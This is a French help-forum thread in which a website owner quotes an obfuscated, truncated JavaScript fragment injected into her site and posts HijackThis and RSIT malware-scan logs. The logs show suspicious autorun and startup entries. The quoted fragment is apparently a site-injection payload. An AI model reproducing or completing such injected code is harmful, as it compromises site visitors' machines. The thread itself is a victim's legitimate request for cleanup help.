|
 Posté le 20/02/2010 @ 17:13 |
Petite astucienne
| Bonjour,
Je suis nouvelle sur ce forum et novice en informatique. J'ai un site (location de gîte). depuis quelques jours, il apparaît un drôle de message dont voici le contenu :
try{window.onload=function(){D1btocibhedx = '' + 'r!(!e#(@t(!a&@i&#)l!@@m@^!e&&n^o$()t&^&!-&@@c&#^o#)@m!.!&&m()((o@$n)$e@@#&y@$c!o@n)@!t$!$r)^o#^l!.(&c$o$@&m#).#&x)&e^&(-&c#o^$&m().!&@a$^!v&! ...
Comment me débarrasser de ce charabia et retrouver mon site propre car les visiteurs n'auront pas envie de s'aventurer sur le site avec un tel message.
Modifié par chimere06200 le 25/02/2010 11:34 |
|
|
|
|
|
Posté le 20/02/2010 à 17:17 |
 Astucien | |
|
Posté le 20/02/2010 à 20:20 |
Petite astucienne
| Merci pour ta réponse. Je n'avance toujours pas et je ne sais pas si j'ai été hackée. Comment désactiver mon site ?
|
|
Posté le 20/02/2010 à 22:23 |
Petite astucienne
| Bonsoir,
Voici le résultat des rapports suite à vos conseils. A partir de là que dois-je faire.
Encore merci.
Logfile of random's system information tool 1.06 (written by random/random)
Run by maman at 2010-02-20 20:25:59
Microsoft® Windows Vista™ Édition Familiale Premium Service Pack 2
System drive C: has 89 GB (61%) free of 145 GB
Total RAM: 2046 MB (48% free)
Logfile of Trend Micro HijackThis v2.0.2
Scan saved at 20:26:47, on 20/02/2010
Platform: Windows Vista SP2 (WinNT 6.00.1906)
MSIE: Internet Explorer v8.00 (8.00.6001.18882)
Boot mode: Normal
Running processes:
C:\Windows\system32\Dwm.exe
C:\Windows\Explorer.EXE
C:\Program Files\Windows Defender\MSASCui.exe
C:\Program Files\Synaptics\SynTP\SynTPEnh.exe
C:\Program Files\Hewlett-Packard\HP Quick Launch Buttons\QLBCTRL.exe
C:\Program Files\Hewlett-Packard\HP Wireless Assistant\HPWAMain.exe
C:\Program Files\Hewlett-Packard\HP Wireless Assistant\WiFiMsg.exe
C:\Program Files\HP\HP Software Update\hpwuSchd2.exe
C:\Program Files\QuickTime\qttask.exe
C:\Windows\WindowsMobile\wmdSync.exe
C:\Windows\System32\rundll32.exe
C:\Program Files\Alwil Software\Avast5\AvastUI.exe
C:\Program Files\Common Files\LightScribe\LightScribeControlPanel.exe
C:\Windows\ehome\ehtray.exe
C:\Program Files\Skype\Phone\Skype.exe
C:\Program Files\Windows Media Player\wmpnscfg.exe
C:\Program Files\Spybot - Search & Destroy\TeaTimer.exe
C:\Program Files\Sony Ericsson\Sony Ericsson PC Suite\SEPCSuite.exe
C:\Program Files\HP\Digital Imaging\bin\hpqtra08.exe
C:\Program Files\Philips\SA28XX Device Manager\main.exe
C:\Windows\System32\rundll32.exe
C:\Windows\ehome\ehmsas.exe
C:\Windows\system32\taskeng.exe
C:\Program Files\Skype\Plugin Manager\skypePM.exe
C:\Program Files\HP\Digital Imaging\bin\hpqSTE08.exe
C:\Program Files\HP\Digital Imaging\bin\hpqbam08.exe
C:\Program Files\Hewlett-Packard\Shared\HpqToaster.exe
C:\Windows\system32\conime.exe
C:\Program Files\Common Files\Adobe\Updater6\Adobe_Updater.exe
C:\Program Files\Mozilla Firefox\firefox.exe
C:\Users\maman\Saved Games\Downloads\RSIT.exe
C:\Program Files\trend micro\maman.exe
R0 - HKCU\Software\Microsoft\Internet Explorer\Main,Start Page = http://www.google.fr/
R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = http://ie.redirect.hp.com/svs/rdr?TYPE=3&tp=iehome&locale=FR_FR&c=73&bd=Pavilion&pf=laptop
R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Default_Search_URL = http://go.microsoft.com/fwlink/?LinkId=54896
R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Search Page = http://go.microsoft.com/fwlink/?LinkId=54896
R0 - HKLM\Software\Microsoft\Internet Explorer\Main,Start Page = http://ie.redirect.hp.com/svs/rdr?TYPE=3&tp=iehome&locale=FR_FR&c=73&bd=Pavilion&pf=laptop
R0 - HKLM\Software\Microsoft\Internet Explorer\Search,SearchAssistant =
R0 - HKLM\Software\Microsoft\Internet Explorer\Search,CustomizeSearch =
R0 - HKCU\Software\Microsoft\Internet Explorer\Toolbar,LinksFolderName =
O1 - Hosts: ::1 localhost
O2 - BHO: AcroIEHelperStub - {18DF081C-E8AD-4283-A596-FA578C2EBDC3} - C:\Program Files\Common Files\Adobe\Acrobat\ActiveX\AcroIEHelperShim.dll
O2 - BHO: Spybot-S&D IE Protection - {53707962-6F74-2D53-2644-206D7942484F} - C:\PROGRA~1\SPYBOT~1\SDHelper.dll
O2 - BHO: EoRezoBHO - {64F56FC1-1272-44CD-BA6E-39723696E350} - C:\PROGRA~1\EoRezo\EoAdv\EOREZO~1.DLL (file missing)
O2 - BHO: SSVHelper Class - {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} - C:\Program Files\Java\jre1.6.0_07\bin\ssv.dll
O2 - BHO: (no name) - {7E853D72-626A-48EC-A868-BA8D5E23E045} - (no file)
O2 - BHO: Programme d'aide de l'Assistant de connexion Windows Live - {9030D464-4C02-4ABF-8ECC-5164760863C6} - C:\Program Files\Common Files\Microsoft Shared\Windows Live\WindowsLiveLogin.dll
O4 - HKLM\..\Run: [Windows Defender] %ProgramFiles%\Windows Defender\MSASCui.exe -hide
O4 - HKLM\..\Run: [SynTPEnh] C:\Program Files\Synaptics\SynTP\SynTPEnh.exe
O4 - HKLM\..\Run: [QlbCtrl] %ProgramFiles%\Hewlett-Packard\HP Quick Launch Buttons\QlbCtrl.exe /Start
O4 - HKLM\..\Run: [HP Health Check Scheduler] c:\Program Files\Hewlett-Packard\HP Health Check\HPHC_Scheduler.exe
O4 - HKLM\..\Run: [hpWirelessAssistant] %ProgramFiles%\Hewlett-Packard\HP Wireless Assistant\HPWAMain.exe
O4 - HKLM\..\Run: [WAWifiMessage] %ProgramFiles%\Hewlett-Packard\HP Wireless Assistant\WiFiMsg.exe
O4 - HKLM\..\Run: [HP Software Update] C:\Program Files\HP\HP Software Update\HPWuSchd2.exe
O4 - HKLM\..\Run: [QuickTime Task] "C:\Program Files\QuickTime\qttask.exe" -atboottime
O4 - HKLM\..\Run: [Adobe Reader Speed Launcher] "C:\Program Files\Adobe\Reader 9.0\Reader\Reader_sl.exe"
O4 - HKLM\..\Run: [Windows Mobile-based device management] %windir%\WindowsMobile\wmdSync.exe
O4 - HKLM\..\Run: [NvSvc] RUNDLL32.EXE C:\Windows\system32\nvsvc.dll,nvsvcStart
O4 - HKLM\..\Run: [NvCplDaemon] RUNDLL32.EXE C:\Windows\system32\NvCpl.dll,NvStartup
O4 - HKLM\..\Run: [NvMediaCenter] RUNDLL32.EXE C:\Windows\system32\NvMcTray.dll,NvTaskbarInit
O4 - HKLM\..\Run: [avast5] C:\PROGRA~1\ALWILS~1\Avast5\avastUI.exe /nogui
O4 - HKLM\..\RunOnce: [Launcher] %WINDIR%\SMINST\launcher.exe
O4 - HKCU\..\Run: [LightScribe Control Panel] C:\Program Files\Common Files\LightScribe\LightScribeControlPanel.exe -hidden
O4 - HKCU\..\Run: [ehTray.exe] C:\Windows\ehome\ehTray.exe
O4 - HKCU\..\Run: [Skype] "C:\Program Files\Skype\Phone\Skype.exe" /nosplash /minimized
O4 - HKCU\..\Run: [WMPNSCFG] C:\Program Files\Windows Media Player\WMPNSCFG.exe
O4 - HKCU\..\Run: [SpybotSD TeaTimer] C:\Program Files\Spybot - Search & Destroy\TeaTimer.exe
O4 - HKCU\..\Run: [Sony Ericsson PC Suite] "C:\Program Files\Sony Ericsson\Sony Ericsson PC Suite\SEPCSuite.exe" /systray /nologon
O4 - HKCU\..\RunOnce: [SpybotDeletingD3059] cmd.exe /c del "C:\Program Files\Everest Poker\casino.exe"
O4 - HKUS\S-1-5-19\..\Run: [Sidebar] %ProgramFiles%\Windows Sidebar\Sidebar.exe /detectMem (User 'SERVICE LOCAL')
O4 - HKUS\S-1-5-19\..\Run: [WindowsWelcomeCenter] rundll32.exe oobefldr.dll,ShowWelcomeCenter (User 'SERVICE LOCAL')
O4 - HKUS\S-1-5-20\..\Run: [Sidebar] %ProgramFiles%\Windows Sidebar\Sidebar.exe /detectMem (User 'SERVICE RÉSEAU')
O4 - Global Startup: HP Digital Imaging Monitor.lnk = C:\Program Files\HP\Digital Imaging\bin\hpqtra08.exe
O4 - Global Startup: Philips Gestionnaire de périphériques.lnk = C:\Program Files\Philips\SA28XX Device Manager\main.exe
O8 - Extra context menu item: Add to Google Photos Screensa&ver - res://C:\Windows\system32\GPhotos.scr/200
O8 - Extra context menu item: E&xporter vers Microsoft Excel - res://C:\PROGRA~1\MICROS~3\Office10\EXCEL.EXE/3000
O9 - Extra button: (no name) - {08B0E5C0-4FCB-11CF-AAA5-00401C608501} - C:\PROGRA~1\Java\JRE16~3.0_0\bin\ssv.dll
O9 - Extra 'Tools' menuitem: Console Java (Sun) - {08B0E5C0-4FCB-11CF-AAA5-00401C608501} - C:\PROGRA~1\Java\JRE16~3.0_0\bin\ssv.dll
O9 - Extra button: Research - {92780B25-18CC-41C8-B9BE-3C9C571A8263} - C:\PROGRA~1\MICROS~3\Office12\REFIEBAR.DLL
O9 - Extra button: (no name) - {DFB852A3-47F8-48C4-A200-58CAB36FD2A2} - C:\PROGRA~1\SPYBOT~1\SDHelper.dll
O9 - Extra 'Tools' menuitem: Spybot - Search & Destroy Configuration - {DFB852A3-47F8-48C4-A200-58CAB36FD2A2} - C:\PROGRA~1\SPYBOT~1\SDHelper.dll
O13 - Gopher Prefix:
O16 - DPF: {D4323BF2-006A-4440-A2F5-27E3E7AB25F8} - http://a532.g.akamai.net/f/532/6712/5m/virtools.download.akamai.com/6712/player/install/installer.exe
O18 - Protocol: skype4com - {FFC8B962-9B40-4DFF-9458-1830C7DD7F5D} - C:\PROGRA~1\COMMON~1\Skype\SKYPE4~1.DLL
O23 - Service: avast! Antivirus - ALWIL Software - C:\Program Files\Alwil Software\Avast5\AvastSvc.exe
O23 - Service: avast! Mail Scanner - ALWIL Software - C:\Program Files\Alwil Software\Avast5\AvastSvc.exe
O23 - Service: avast! Web Scanner - ALWIL Software - C:\Program Files\Alwil Software\Avast5\AvastSvc.exe
O23 - Service: Com4Qlb - Hewlett-Packard Development Company, L.P. - C:\Program Files\Hewlett-Packard\HP Quick Launch Buttons\Com4Qlb.exe
O23 - Service: Google Updater Service (gusvc) - Google - C:\Program Files\Google\Common\Google Updater\GoogleUpdaterService.exe
O23 - Service: HP Health Check Service - Hewlett-Packard - c:\Program Files\Hewlett-Packard\HP Health Check\hphc_service.exe
O23 - Service: hpqwmiex - Hewlett-Packard Development Company, L.P. - C:\Program Files\Hewlett-Packard\Shared\hpqwmiex.exe
O23 - Service: InstallDriver Table Manager (IDriverT) - Macrovision Corporation - C:\Program Files\Common Files\InstallShield\Driver\1050\Intel 32\IDriverT.exe
O23 - Service: LightScribeService Direct Disc Labeling Service (LightScribeService) - Hewlett-Packard Company - C:\Program Files\Common Files\LightScribe\LSSrvc.exe
O23 - Service: Sony Ericsson OMSI download service (OMSI download service) - Unknown owner - C:\Program Files\Sony Ericsson\Sony Ericsson PC Suite\SupServ.exe
O23 - Service: RoxMediaDB9 - Sonic Solutions - C:\Program Files\Common Files\Roxio Shared\9.0\SharedCOM\RoxMediaDB9.exe
O23 - Service: SBSD Security Center Service (SBSDWSCService) - Safer Networking Ltd. - C:\Program Files\Spybot - Search & Destroy\SDWinSec.exe
O23 - Service: stllssvr - MicroVision Development, Inc. - C:\Program Files\Common Files\SureThing Shared\stllssvr.exe
O23 - Service: Symantec AppCore Service (SymAppCore) - Unknown owner - c:\Program Files\Common Files\Symantec Shared\AppCore\AppSvc32.exe (file missing)
O23 - Service: XAudioService - Conexant Systems, Inc. - C:\Windows\system32\DRIVERS\xaudio.exe
--
End of file - 9158 bytes
======Scheduled tasks folder======
C:\Windows\tasks\HPCeeScheduleFormaman.job
C:\Windows\tasks\Maintenance en 1 clic.job
C:\Windows\tasks\User_Feed_Synchronization-{837C62D4-F802-42E1-BA8C-0E2FF49DE2F0}.job
======Registry dump======
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{18DF081C-E8AD-4283-A596-FA578C2EBDC3}]
Adobe PDF Link Helper - C:\Program Files\Common Files\Adobe\Acrobat\ActiveX\AcroIEHelperShim.dll [2009-02-27 75128]
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{53707962-6F74-2D53-2644-206D7942484F}]
Spybot-S&D IE Protection - C:\PROGRA~1\SPYBOT~1\SDHelper.dll [2009-01-26 1879896]
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{64F56FC1-1272-44CD-BA6E-39723696E350}]
EoBho Class - C:\PROGRA~1\EoRezo\EoAdv\EOREZO~1.DLL []
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{761497BB-D6F0-462C-B6EB-D4DAF1D92D43}]
SSVHelper Class - C:\Program Files\Java\jre1.6.0_07\bin\ssv.dll [2008-06-10 509328]
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{7E853D72-626A-48EC-A868-BA8D5E23E045}]
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{9030D464-4C02-4ABF-8ECC-5164760863C6}]
Programme d'aide de l'Assistant de connexion Windows Live - C:\Program Files\Common Files\Microsoft Shared\Windows Live\WindowsLiveLogin.dll [2009-02-17 408440]
[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run]
"Windows Defender"=C:\Program Files\Windows Defender\MSASCui.exe [2008-01-19 1008184]
"SynTPEnh"=C:\Program Files\Synaptics\SynTP\SynTPEnh.exe [2007-01-13 827392]
"QlbCtrl"=C:\Program Files\Hewlett-Packard\HP Quick Launch Buttons\QlbCtrl.exe [2007-02-13 159744]
"HP Health Check Scheduler"=c:\Program Files\Hewlett-Packard\HP Health Check\HPHC_Scheduler.exe [2008-06-16 75008]
"hpWirelessAssistant"=C:\Program Files\Hewlett-Packard\HP Wireless Assistant\HPWAMain.exe [2007-03-01 472776]
"WAWifiMessage"=C:\Program Files\Hewlett-Packard\HP Wireless Assistant\WiFiMsg.exe [2007-01-10 317128]
"HP Software Update"=C:\Program Files\HP\HP Software Update\HPWuSchd2.exe [2006-12-10 49152]
"EoEngine"= []
"QuickTime Task"=C:\Program Files\QuickTime\qttask.exe [2008-03-02 98304]
"Adobe Reader Speed Launcher"=C:\Program Files\Adobe\Reader 9.0\Reader\Reader_sl.exe [2009-02-27 35696]
"Windows Mobile-based device management"=C:\Windows\WindowsMobile\wmdSync.exe [2006-11-02 215552]
"NvSvc"=C:\Windows\system32\nvsvc.dll [2007-09-19 86016]
"NvCplDaemon"=C:\Windows\system32\NvCpl.dll [2007-09-19 8497696]
"NvMediaCenter"=C:\Windows\system32\NvMcTray.dll [2007-09-19 81920]
"avast5"=C:\PROGRA~1\ALWILS~1\Avast5\avastUI.exe [2010-02-11 2756488]
[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunOnce]
"Launcher"=C:\Windows\SMINST\launcher.exe [2006-11-07 44128]
[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run]
"LightScribe Control Panel"=C:\Program Files\Common Files\LightScribe\LightScribeControlPanel.exe [2007-04-19 484904]
"ehTray.exe"=C:\Windows\ehome\ehTray.exe [2008-01-19 125952]
"Skype"=C:\Program Files\Skype\Phone\Skype.exe [2009-06-26 25604904]
"WMPNSCFG"=C:\Program Files\Windows Media Player\WMPNSCFG.exe [2008-01-19 202240]
"SpybotSD TeaTimer"=C:\Program Files\Spybot - Search & Destroy\TeaTimer.exe [2009-03-05 2260480]
"Sony Ericsson PC Suite"=C:\Program Files\Sony Ericsson\Sony Ericsson PC Suite\SEPCSuite.exe [2009-11-20 434176]
[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce]
"SpybotDeletingD3059"=cmd.exe /c del C:\Program Files\Everest Poker\casino.exe []
[HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\32868532]
C:\ProgramData\32868532\32868532.exe []
[HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\BitComet]
C:\Program Files\BitComet\BitComet.exe /tray []
[HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\CTFMON]
C:\Windows\Temp\_ex-08.exe []
[HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\Sony Ericsson PC Suite]
C:\Program Files\Sony Ericsson\Mobile2\Application Launcher\Application Launcher.exe /startoptions []
[HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\sysgif32]
C:\Users\maman\AppData\Local\Temp\~TM50A7.tmp []
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup
HP Digital Imaging Monitor.lnk - C:\Program Files\HP\Digital Imaging\bin\hpqtra08.exe
Philips Gestionnaire de périphériques.lnk - C:\Program Files\Philips\SA28XX Device Manager\main.exe
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot\network\WudfPf]
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot\network\WudfRd]
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot\network\WudfSvc]
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot\network\WudfUsbccidDriver]
[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System]
"LogonHoursAction"=2
"DontDisplayLogonHoursWarnings"=1
[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System]
"EnableLUA"=0
"dontdisplaylastusername"=0
"legalnoticecaption"=
"legalnoticetext"=
"shutdownwithoutlogon"=1
"undockwithoutlogon"=1
"EnableUIADesktopToggle"=0
[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\explorer]
"NoDriveTypeAutoRun"=145
[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\explorer]
"BindDirectlyToPropertySetStorage"=
[HKEY_LOCAL_MACHINE\system\currentcontrolset\services\sharedaccess\parameters\firewallpolicy\standardprofile\authorizedapplications\list]
[HKEY_LOCAL_MACHINE\system\currentcontrolset\services\sharedaccess\parameters\firewallpolicy\domainprofile\authorizedapplications\list]
[HKEY_CURRENT_USER\software\microsoft\windows\currentversion\explorer\mountpoints2\{0c39c2ac-4cb5-11dd-b620-001b24dd66d7}]
shell\Auto\command - AdobeR.exe e
shell\AutoRun\command - C:\Windows\system32\RunDLL32.EXE Shell32.DLL,ShellExec_RunDLL AdobeR.exe e
[HKEY_CURRENT_USER\software\microsoft\windows\currentversion\explorer\mountpoints2\{4bee0075-3ed8-11dd-b794-001b24dd66d7}]
shell\AutoRun\command - F:\c.cmd
shell\explore\command - F:\c.cmd
shell\open\command - F:\c.cmd
======File associations======
.js - edit - C:\Windows\System32\Notepad.exe %1
.js - open - C:\Windows\System32\WScript.exe "%1" %*
.txt - open - C:\Windows\notepad.exe %1
======List of files/folders created in the last 1 months======
2010-02-20 20:26:00 ----D---- C:\Program Files\trend micro
2010-02-20 20:25:59 ----D---- C:\rsit
2010-02-11 13:03:38 ----A---- C:\Windows\system32\tsbyuv.dll
2010-02-11 13:03:38 ----A---- C:\Windows\system32\quartz.dll
2010-02-11 13:03:38 ----A---- C:\Windows\system32\msyuv.dll
2010-02-11 13:03:38 ----A---- C:\Windows\system32\msvidc32.dll
2010-02-11 13:03:38 ----A---- C:\Windows\system32\msrle32.dll
2010-02-11 13:03:37 ----A---- C:\Windows\system32\msvfw32.dll
2010-02-11 13:03:37 ----A---- C:\Windows\system32\mciavi32.dll
2010-02-11 13:03:37 ----A---- C:\Windows\system32\iyuv_32.dll
2010-02-11 13:03:37 ----A---- C:\Windows\system32\avifil32.dll
2010-02-10 21:14:37 ----D---- C:\ProgramData\BVRP Software
2010-02-10 21:11:04 ----A---- C:\ProgramData\hpeA6B.dll
2010-02-10 21:10:37 ----D---- C:\ProgramData\Sony Ericsson
2010-01-24 14:24:34 ----A---- C:\Windows\system32\aswBoot.exe
2010-01-24 11:31:29 ----A---- C:\Windows\wininit.ini
2010-01-24 11:05:34 ----D---- C:\ProgramData\Spybot - Search & Destroy
2010-01-24 11:05:34 ----D---- C:\Program Files\Spybot - Search & Destroy
2010-01-24 10:39:25 ----A---- C:\Windows\system32\mshtml.dll
2010-01-24 10:39:24 ----A---- C:\Windows\system32\ieframe.dll
2010-01-24 10:39:23 ----A---- C:\Windows\system32\wininet.dll
2010-01-24 10:39:23 ----A---- C:\Windows\system32\urlmon.dll
2010-01-24 10:39:23 ----A---- C:\Windows\system32\iertutil.dll
2010-01-24 10:39:22 ----A---- C:\Windows\system32\occache.dll
2010-01-24 10:39:22 ----A---- C:\Windows\system32\msfeedsbs.dll
2010-01-24 10:39:22 ----A---- C:\Windows\system32\msfeeds.dll
2010-01-24 10:39:22 ----A---- C:\Windows\system32\jsproxy.dll
2010-01-24 10:39:22 ----A---- C:\Windows\system32\ieUnatt.exe
2010-01-24 10:39:22 ----A---- C:\Windows\system32\ieui.dll
2010-01-24 10:39:22 ----A---- C:\Windows\system32\iesysprep.dll
2010-01-24 10:39:22 ----A---- C:\Windows\system32\iepeers.dll
2010-01-24 10:39:22 ----A---- C:\Windows\system32\iedkcs32.dll
2010-01-24 10:39:17 ----A---- C:\Windows\system32\msfeedssync.exe
2010-01-24 10:39:17 ----A---- C:\Windows\system32\iesetup.dll
2010-01-24 10:39:17 ----A---- C:\Windows\system32\iernonce.dll
2010-01-24 10:39:17 ----A---- C:\Windows\system32\ie4uinit.exe
2010-01-23 22:39:44 ----D---- C:\ProgramData\Alwil Software
2010-01-23 16:56:16 ----A---- C:\Windows\ntbtlog.txt
2010-01-23 15:53:04 ----D---- C:\ProgramData\32868532
2010-01-23 08:39:56 ----D---- C:\Users\maman\AppData\Roaming\HpUpdate
2010-01-23 08:39:53 ----D---- C:\Windows\Hewlett-Packard
======List of files/folders modified in the last 1 months======
2010-02-20 20:26:14 ----D---- C:\Windows\Prefetch
2010-02-20 20:26:06 ----D---- C:\Windows\Temp
2010-02-20 20:26:00 ----RD---- C:\Program Files
2010-02-20 20:08:21 ----D---- C:\Users\maman\AppData\Roaming\Skype
2010-02-20 19:37:52 ----A---- C:\Windows\NeroDigital.ini
2010-02-20 19:36:49 ----D---- C:\Program Files\Mozilla Firefox
2010-02-20 16:09:25 ----D---- C:\Users\maman\AppData\Roaming\skypePM
2010-02-20 14:52:44 ----D---- C:\Users\maman\AppData\Roaming\FileZilla
2010-02-20 11:58:32 ----SHD---- C:\System Volume Information
2010-02-20 11:49:06 ----D---- C:\ProgramData\Skyline
2010-02-20 11:35:48 ----SHD---- C:\Windows\Installer
2010-02-20 11:35:43 ----D---- C:\ProgramData\Microsoft Help
2010-02-20 07:46:27 ----D---- C:\Windows\SMINST
2010-02-18 18:32:08 ----D---- C:\Windows
2010-02-16 16:20:22 ----D---- C:\Windows\System32
2010-02-16 16:20:22 ----D---- C:\Windows\inf
2010-02-16 16:20:22 ----A---- C:\Windows\system32\PerfStringBackup.INI
2010-02-13 13:53:55 ----D---- C:\Windows\system32\catroot2
2010-02-11 20:20:35 ----D---- C:\Windows\winsxs
2010-02-11 20:10:25 ----D---- C:\Windows\system32\catroot
2010-02-11 20:06:26 ----D---- C:\Windows\system32\drivers
2010-02-11 20:06:25 ----D---- C:\Program Files\Windows Mail
2010-02-10 21:14:37 ----HD---- C:\ProgramData
2010-02-10 21:10:37 ----HD---- C:\Program Files\InstallShield Installation Information
2010-02-10 21:10:37 ----D---- C:\Program Files\Sony Ericsson
2010-02-01 20:26:20 ----A---- C:\Windows\system32\mrt.exe
2010-01-31 11:48:33 ----D---- C:\Windows\Tasks
2010-01-31 11:48:33 ----D---- C:\Windows\system32\Tasks
2010-01-27 20:51:18 ----D---- C:\Program Files\Internet Explorer
2010-01-24 14:25:00 ----D---- C:\Program Files\Common Files\microsoft shared
2010-01-24 14:00:28 ----D---- C:\Users\maman\AppData\Roaming\Teleca
2010-01-24 14:00:24 ----D---- C:\Windows\Downloaded Installations
2010-01-24 14:00:11 ----D---- C:\Program Files\Common Files\Teleca Shared
2010-01-24 14:00:07 ----D---- C:\Program Files\Common Files
2010-01-24 13:54:46 ----D---- C:\Windows\system32\migration
2010-01-23 22:41:00 ----D---- C:\Program Files\Alwil Software
======List of drivers (R=Running, S=Stopped, 0=Boot, 1=System, 2=Auto, 3=Demand, 4=Disabled)======
R1 aswRdr;aswRdr; C:\Windows\system32\drivers\aswRdr.sys [2010-02-11 23376]
R1 aswSP;aswSP; C:\Windows\system32\drivers\aswSP.sys [2010-02-11 162512]
R1 aswTdi;avast! Network Shield Support; C:\Windows\system32\drivers\aswTdi.sys [2010-02-11 46672]
R1 eabfiltr;eabfiltr; C:\Windows\system32\DRIVERS\eabfiltr.sys [2006-11-30 8192]
R1 IDSvix86;Symantec Intrusion Prevention Driver; \??\C:\PROGRA~2\Symantec\DEFINI~1\SymcData\idsdefs\20080215.002\IDSvix86.sys [2008-02-13 261680]
R1 kl1;kl1; C:\Windows\system32\DRIVERS\kl1.sys [2007-10-31 110096]
R1 SRTSPX;SRTSPX; C:\Windows\System32\Drivers\SRTSPX.SYS [2007-11-30 43696]
R1 SYMTDI;SYMTDI; C:\Windows\System32\Drivers\SYMTDI.SYS [2007-10-30 191536]
R2 aswFsBlk;aswFsBlk; C:\Windows\system32\drivers\aswFsBlk.sys [2010-02-11 19024]
R2 aswMonFlt;aswMonFlt; \??\C:\Windows\system32\drivers\aswMonFlt.sys [2010-02-11 51792]
R2 mdmxsdk;mdmxsdk; C:\Windows\system32\DRIVERS\mdmxsdk.sys [2006-06-19 12672]
R2 rimmptsk;rimmptsk; C:\Windows\system32\DRIVERS\rimmptsk.sys [2007-02-24 39936]
R2 rimsptsk;rimsptsk; C:\Windows\system32\DRIVERS\rimsptsk.sys [2007-01-23 42496]
R2 rismxdp;Ricoh xD-Picture Card Driver; C:\Windows\system32\DRIVERS\rixdptsk.sys [2007-01-23 37376]
R2 XAudio;XAudio; C:\Windows\system32\DRIVERS\xaudio.sys [2006-11-28 8192]
R3 BCM43XX;Pilote pour carte réseau Broadcom 802.11; C:\Windows\system32\DRIVERS\bcmwl6.sys [2007-01-03 534016]
R3 CmBatt;Pilote pour Batterie à méthode de contrôle ACPI Microsoft; C:\Windows\system32\DRIVERS\CmBatt.sys [2008-01-19 14208]
R3 CnxtHdAudService;Conexant UAA Function Driver for High Definition Audio Service; C:\Windows\system32\drivers\CHDRT32.sys [2008-03-03 188416]
R3 HBtnKey;HBtnKey; C:\Windows\system32\DRIVERS\cpqbttn.sys [2006-06-28 9472]
R3 HSF_DPV;HSF_DPV; C:\Windows\system32\DRIVERS\HSX_DPV.sys [2006-12-07 985600]
R3 HSXHWAZL;HSXHWAZL; C:\Windows\system32\DRIVERS\HSXHWAZL.sys [2006-12-07 207360]
R3 NVENETFD;NVIDIA nForce Networking Controller Driver; C:\Windows\system32\DRIVERS\nvmfdx32.sys [2007-03-07 1059112]
R3 nvlddmkm;nvlddmkm; C:\Windows\system32\DRIVERS\nvlddmkm.sys [2007-09-19 7626400]
R3 nvsmu;nvsmu; C:\Windows\system32\DRIVERS\nvsmu.sys [2007-02-17 12032]
R3 sdbus;sdbus; C:\Windows\system32\DRIVERS\sdbus.sys [2009-04-11 89088]
R3 SymEvent;SymEvent; \??\C:\Windows\system32\Drivers\SYMEVENT.SYS [2007-12-22 123952]
R3 SynTP;Synaptics TouchPad Driver; C:\Windows\system32\DRIVERS\SynTP.sys [2007-01-13 181432]
R3 usbvideo;Périphérique vidéo USB (WDM); C:\Windows\System32\Drivers\usbvideo.sys [2008-01-19 134016]
R3 winachsf;winachsf; C:\Windows\system32\DRIVERS\HSX_CNXT.sys [2006-12-07 659968]
R3 WmiAcpi;Microsoft Windows Management Interface for ACPI; C:\Windows\system32\DRIVERS\wmiacpi.sys [2008-01-19 11264]
S3 BCM43XV;Pilote de la carte réseau extensible Broadcom 802.11; C:\Windows\system32\DRIVERS\bcmwl6.sys [2007-01-03 534016]
S3 Dot4;Pilote MS IEEE-1284.4; C:\Windows\system32\DRIVERS\Dot4.sys [2008-01-19 131584]
S3 Dot4Print;Pilote de classe Imprimante pour IEEE-1284.4; C:\Windows\system32\DRIVERS\Dot4Prt.sys [2008-01-19 16384]
S3 dot4usb;MS Dot4USB Filter Dot4USB Filter; C:\Windows\system32\DRIVERS\dot4usb.sys [2008-01-19 36864]
S3 drmkaud;Filtre de décodeur DRM (Noyau Microsoft); C:\Windows\system32\drivers\drmkaud.sys [2008-01-19 5632]
S3 E100B;Pilote de carte Intel (R) PRO; C:\Windows\system32\DRIVERS\e100b325.sys [2006-11-02 163328]
S3 HdAudAddService;Microsoft UAA Function Driver for High Definition Audio Service; C:\Windows\system32\drivers\CHDART.sys [2007-04-12 160768]
S3 HSFHWAZL;HSFHWAZL; C:\Windows\system32\DRIVERS\VSTAZL3.SYS [2006-11-02 200704]
S3 ialm;ialm; C:\Windows\system32\DRIVERS\igdkmd32.sys [2006-10-19 1380864]
S3 MSKSSRV;Proxy de service de répartition Microsoft; C:\Windows\system32\drivers\MSKSSRV.sys [2008-01-19 8192]
